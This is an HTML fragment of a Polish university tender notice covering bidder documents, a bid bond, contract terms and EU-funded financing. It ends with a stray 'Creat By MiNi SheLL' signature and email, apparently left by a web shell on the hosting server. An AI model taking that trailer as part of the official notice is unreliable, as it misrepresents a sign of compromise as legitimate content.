warunki udziału w postępowaniu.<br/>A.5. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności podmiotów udostępniających<br/>zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach podmiotów udostępniających<br/>zasoby.<br/>B. Wymogi dotyczące Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>B.1. Zgodnie z art. 117 ust. 3 ustawy Zamawiający określa, że w odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>B.2. Zgodnie z art. 117 ust. 4 ustawy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy – załącznik nr 5 do SWZ.<br/>B.3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnianie warunków określonych w<br/>pkt 5.2.4. SWZ, może wykazać dowolny Wykonawca spośród Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż pięć [5]<br/>dni, terminie aktualnych na dzień złożenia podmiotowych środków dowodowych, tj.: w celu potwierdzenia spełniania przez<br/>Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający będzie żądał<br/>dostarczenia:<br/>WYKAZU OSÓB, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie z treścią załącznika nr 6<br/>do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> I. Wykonawca[Wyk.] zobowiązany jest dostarczyć Zamawiający[Zam.] w terminie składania ofert następujące dokumenty:<br/>1.Formularz ofertowy(zał.nr1 doSWZ).<br/>2.Oświadczenie, o którym mowa w pkt.6.1 SWZ (zał.nr2 do SWZ).<br/>3.Odpis lub informacja z Krajowego Rejestru Sądowego [KRS], Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej [CEiDG] lub innego właściwego rejestru**–celem potwierdzenia, że osoba działająca w imieniu Wykonawcy<br/>jest umocowana do jego reprezentowania.<br/>4.Pełnomocnictwo* dla osoby/osób podpisującej ofertę i oświadczenia (w sytuacji, gdy ofertę podpisuje osoba, której prawo<br/>do reprezentowania Wykonawcy nie wynika z dokumentów załączonych do oferty lub ogólnodostępnych dokumentów<br/>rejestrowych).<br/>Wykonawcy korzystający z zasobów podmiotów udostępniających dostarczają dodatkowo–jeżeli dotyczy:<br/>5.Ośw.,o którym mowa w pkt.6.2 SWZ (zał.nr 2 do SWZ).<br/>6.Zobowiązanie podmiotu udostępniającego zasoby (zał.nr 4 do SWZ).<br/>7.Odpis lub inf.z KRS, CEiDG lub innego właściwego rejestru**.<br/>8.Pełnomocnictwo* dla osoby reprezentującej podmiot udostępniający (w sytuacji, gdy ofertę podpisuje osoba, której prawo<br/>do reprezentowania Wykonawcy nie wynika z innych dokumentów załączonych do oferty).<br/>9. Wadium<br/>W sytuacji, w której Wykonawcą są podmioty wspólnie ubiegające się o udzielenie zamówienia dostarczają–jeżeli dotyczy:<br/>10.Ośw., o którym mowa w pkt.6.2 SWZ (zał.nr 2 do SWZ), składane przez każdego z Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia (każdego członka spółki, każdego członka konsorcjum).<br/>11.Ośw. Wykonawców wspólnie ubiegających się o udzielenie zamówienia z art.117 ust.4 ustawy–dot.ofert składanych<br/>przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia-zał.nr5 do SWZ.<br/>12.Pełnomocnictwo* dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Zg. z art.8 ust.2 ustawy–w przypadku wspólnego ubiegania się wykonawców o udzielenie<br/>zamówienia (np.sc, konsorcja), wykonawcy zobowiązani są ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pkt.3 stosuje się.<br/>*Pełnomocnictwo należy złożyć w formie oryginału lub notarialnie poświadczonej kopii.<br/>**Wyk.nie jest zobowiązany do złożenia odpisu lub informacji z KRS, CEiDG lub innego właściwego rejestru, jeżeli Zam.<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wyk.wskazał dane umożliwiające dostęp do<br/>tych dokumentów – dot.także Wykonawcy wspólnie ubiegającego się o zamówienie, jak również podmiotów<br/>udostępniających zasoby.<br/>II. Wyk., którego oferta zostanie uznana za najkorzystniejszą, zobowiązany będzie do dostarczenia Zamawiającemu (zg.z<br/>pkt. 20.9 SWZ):<br/>1.Potwierdzenia wniesienia Zabezpieczenia należytego wykonania umowy.<br/>2.Pełnomocnictwa* dla osoby/osób podpisującej umowę (jeśli uprawnienie tej/tych osób/osoby nie wynika z dokumentów<br/>dostarczonych Zamawiającemu w trakcie postępowania).<br/>3.Kopii umowy regulującej współpracę Wykonawców ubiegających się wspólnie o udzielenie zamówienia (jeśli jako<br/>najkorzystniejszą ofertę wybrano ofertę Wykonawców ubiegających się wspólnie o udzielenie zamówienia, Zam. przed<br/>zawarciem umowy zastrzega sobie możliwość żądania przedłożenia takiej umowy).<br/>4.Inf., dot. Podwykonawców (o ile są już znani).<br/>5.Policę OC w zakresie wykonywanej działalności gospodarczej, na kwotę nie mniejszą niż 1000000,00 zł. Umowa<br/>ubezpieczenia nie może przekraczać 2000zł w odniesieniu do franszyzy redukcyjnej oraz przekraczać 2000zł w odniesieniu<br/>do franszyzy integralnej.<br/>6.Potwierdzenia wpisu do rejestru BDO lub przedstawienia dokumentów potwierdzających korzystanie z potencjału<br/>wyspecjalizowanej firmy wpisanej do BDO.<br/>7.Listy osób zatrudnionych na podstawie stosunku pracy w rozumieniu przepisów ustawy z dnia 26.06.1974 r.Kodeks pracy<br/>do wykonywania w ramach realizacji przedmiotu zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta, musi być zabezpieczona wadium w wysokości: 150 000,00 złotych<br/>2. Termin wniesienia i formy wadium<br/>2.1. Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach:<br/>2.1.1. pieniądzu<br/>2.1.2. gwarancjach bankowych<br/>2.1.3. gwarancjach ubezpieczeniowych<br/>2.1.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2024 poz. 419).<br/>3. Sposób składania wadium<br/>3.1. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego: Santander Bank 1 Oddz.<br/>w Opolu. Numer konta: 09 1090 2138 0000 0005 5600 0043 z adnotacją: „Wadium – nr sprawy: B/03/2025/A” lub w inny sposób umożliwiający identyfikację postępowania, którego dotyczy.<br/>3.2. Wadium wnoszone w formach wskazanych w pkt. 2.1.2 - 2.1.4 należy złożyć jako oryginalny dokument w postaci<br/>elektronicznej.<br/>3.3. Beneficjentem wadium wnoszonego w innej formie niż w pieniądzu jest: Uniwersytet Opolski, 45-040 Opole, Pl. Kopernika 11A.<br/>3.4. Z treści gwarancji/poręczenia musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta.<br/>3.5. Z treści gwarancji/poręczenia winno wynikać, że jest gwarancją/poręczeniem nieodwołalną oraz bezwarunkową; na<br/>pierwsze żądanie zgłoszone przez Zamawiającego w terminie związania ofertą; gwarant zobowiązany jest do zapłaty<br/>Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 pkt. 1-3 ustawy.<br/>4. Termin składania wadium<br/>4.1. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert, określonego w pkt. 17.1.1 SWZ.<br/>4.2. Niewniesienie wadium przez Wykonawcę w terminie wskazanym w pkt. 4.1 (także na przedłużony okres związania<br/>ofertą), lub wniesienie przez Wykonawcę wadium w sposób nieprawidłowy lub nieutrzymanie przez Wykonawcę wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożenie przez Wykonawcę wniosku o zwrot wadium w przypadku, o<br/>którym mowa w art. 98 ust. 2 pkt 3 ustawy; skutkować będzie odrzuceniem oferty Wykonawcy na podstawie art. 226 ust. 1<br/>pkt. 14 ustawy.<br/>5. Zwrot wadium<br/>Zamawiający będzie zwracał wadium zgodnie z przepisami określonymi w art. 98 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (np. spółki cywilne, konsorcja), oświadczenie, o<br/>którym mowa w pkt. 6.1 SWZ, składane zgodnie z załącznikiem nr 2 SWZ (sekcja I dotyczy podstaw wykluczenia i<br/>warunków udziału w postępowaniu- składane na podstawie art. 125 ust. 1 ustawy oraz sekcja II dotyczy podstaw<br/>wykluczenia określonych w ustawie o szczególnych rozwiązaniach), składa każdy z Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia i spełnianie warunków udziału w<br/>postępowaniu odpowiednio dla każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2. Ponadto jeśli jako najkorzystniejszą ofertę wybrano ofertę Wykonawców ubiegających się wspólnie o udzielenie<br/>zamówienia, Zamawiający przed zawarciem umowy zastrzega sobie możliwość żądania Kopii umowy regulującej<br/>współpracę Wykonawców ubiegających się wspólnie o udzielenie zamówienia.<br/>3. Pełnomocnictwo* dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia Zgodnie z art. 58 ust. 2 ustawy - w przypadku wspólnego ubiegania się wykonawców o udzielenie<br/>zamówienia (np. spółki cywilne, konsorcja), wykonawcy zobowiązani są ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>Rozdział I pkt. 7.3 SWZ stosuje się.<br/>* Pełnomocnictwo należy złożyć w formie oryginału lub notarialnie poświadczonej kopii. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projekt umowy, w tym ewentualne treści dotyczące zmian do umowy, stanowi<br/>załącznik nr 3 do SWZ (Projekt umowy). Zmiany dotyczące w szczególności siły wyższej określono w treści projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1124008</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-24 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. O udzielenie zamówienia mogą ubiegać się Wykonawcy [Wyk.], którzy:1. nie podlegają wykluczeniu:<br/>1.1. na podst.art. 108 ust.1 ustawy (z zastrzeżeniem art. 110 ust.2 ustawy).<br/>1.2. na podst.art. 7 ust.1 ustawy z dnia 13.04.2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2025poz. 514), dalej jako ustawa o szczególnych rozwiązaniach.<br/>Zamawiający [Zam.] nie przewiduje podstaw wykluczenia, o których mowa w art. 109 ust. 1 ustawy.<br/>2. spełniają warunki udziału w postępowaniu.<br/>II. Zam. żąda, aby Wyk.do oferty dołączył aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zam.–zgodnie z zał. nr 2 do SWZ (sekcja I dot.podstaw wykluczenia i spełniania warunków udziału w postępowaniu składane na podst.art. 125 ust.1 ustawy oraz sekcja II dot.podstaw wykluczenia określonych w ustawie o<br/>szczególnych rozwiązaniach).<br/>III. ZAWARCIE UMOWY<br/>1. Wyk, którego oferta zostanie uznana za najkorzystniejszą, ma obowiązek zawarcia umowy, zgodnie z postanowieniami określonymi w projekcie umowy stanowiącym zał.nr 3 do SWZ oraz na warunkach podanych w swojej ofercie, tożsamych z SWZ, w terminie określonym przez Zam.. Zg.z art. 432 ustawy, umowa wymaga pod rygorem nieważności zachowania formy pisemnej, chyba że przepisy odrębne wymagają formy szczególnej.<br/>2. Termin zawarcia umowy zostanie wyznaczony przez Zam., niezwłocznie po dokonaniu wyboru najkorzystniejszej oferty.<br/>Dot.umów zawieranych w formie elektronicznej:<br/>3. Zam. zastrzega możliwość zawarcia umowy w formie elektronicznej w ślad za dyspozycją przepisu art. 781 § 2 ustawy Kodeks Cywilny. W takim przypadku Zam. wezwie Wyk. do zawarcia umowy i niepodpisanie umowy przez Wyk. w wyznaczonym terminie może zostać uznane przez Zamawiającego za uchylanie się od zawarcia umowy.<br/>4. W przypadku, o którym mowa w pkt. 20.3 SWZ datę zawarcia umowy stanowi dzień (data) przesłania Wyk., za pośrednictwem środków porozumiewania się na odległość, umowy podpisanej przez Zam.<br/>Dot.umów zawieranych w formie tradycyjnej (papierowej):<br/>5. Miejscem zawarcia umowy będzie siedziba Zam.<br/>6. W przypadku braku możliwości stawiennictwa Wyk., którego oferta zostanie uznana za najkorzystniejszą, w wyznaczonym przez Zam terminie i miejscu, na wniosek Wyk. umowa (podpisana ze strony Zam.) może zostać przesłana Wyk. za pośrednictwem poczty tradycyjnej, a Zam.może dodatkowo za pośrednictwem poczty elektronicznej przesłać Wyk. skan umowy podpisanej ze strony Zam. Wówczas data zawarcia umowy pozostanie niezmieniona, zgodna z terminem zawarcia umowy wyznaczonym przez Zam. (zg. pkt. 20.2 SWZ).<br/>IV. Zam.informuje, iż zamówienie zamierza sfinans. ze środków przewidzianych do finansowania/ refundacji w ramach aplikacji o środki Unii Europejskiej w ramach Krajowego Planu Odbudowy i Zwiększania Odporności w zakresie: modernizacja i doposażenie obiektów dydaktycznych w związku ze zwiększeniem limitów przyjęć na studia medyczne w ramach: Komponentu D „Efektywność, dostępność i jakość systemu ochrony zdrowia” Inwestycji D2.1.1 „Inwestycje związane z modernizacją i doposażeniem obiektów dydaktycznych w związku ze zwiększeniem limitów przyjęć na studia medyczne” Wskaźnika D31G „Liczba zmodernizowanych obiektów dydaktycznych do celów kształcenia przedklinicznego (w tym centrów symulacji medycznych), dostosowanych obiektów bazy klinicznej wykorzystywanych do kształcenia w centralnych szpitalach klinicznych, zmodernizowanych infrastruktur bibliotek i akademików na uniwersytetach medycznych” (Nabór nr 2). W związku z powyższym Zam.informuje, że mogą mieć zastosowanie okoliczności określone art. 257 ustawy, tj.: Zam. może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które Zam. zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.

Creat By MiNi SheLL
Email: jattceo@gmail.com